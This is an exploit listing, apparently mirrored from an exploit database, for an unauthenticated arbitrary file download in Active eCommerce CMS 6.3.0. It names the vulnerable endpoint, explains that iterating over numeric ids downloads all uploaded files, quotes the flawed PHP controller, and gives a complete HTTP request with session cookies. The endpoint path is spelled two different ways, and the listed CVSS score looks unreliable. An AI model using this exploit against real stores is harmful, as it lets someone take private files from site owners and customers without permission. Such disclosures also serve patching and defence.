Exploit for Active eCommerce CMS 6.3.0 Arbitrary File Download

Name: Exploit for Active eCommerce CMS 6.3.0 Arbitrary File Download
Rating: 5 (167 reviews)
2022-09-26 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:168489
# Exploit Title: Active eCommerce CMS Arbitrary File Download  
# Exploit Author: th3d1gger  
# Vendor Homepage: https://codecanyon.net  
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405  
# Version: Version 6.3.0  
# Tested on Ubuntu 18.04  
  
without authentication with for loop user can download all files on the website with numeric ids.  
  
/aiz-uploadder/download/{id}  
  
<--Vulnerable source code-->  
public function attachment_download($id)  
{  
$project_attachment = Upload::find($id);  
try{  
$file_path = public_path($project_attachment->file_name);  
return Response::download($file_path);  
}catch(\Exception $e){  
flash(translate('File does not exist!'))->error();  
return back();  
}  
  
}  
  
-------Request-----------  
  
  
GET /aiz-uploader/download/3 HTTP/1.1  
Host: localhost  
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Upgrade-Insecure-Requests: 1  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: empty  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBU  
Connection: close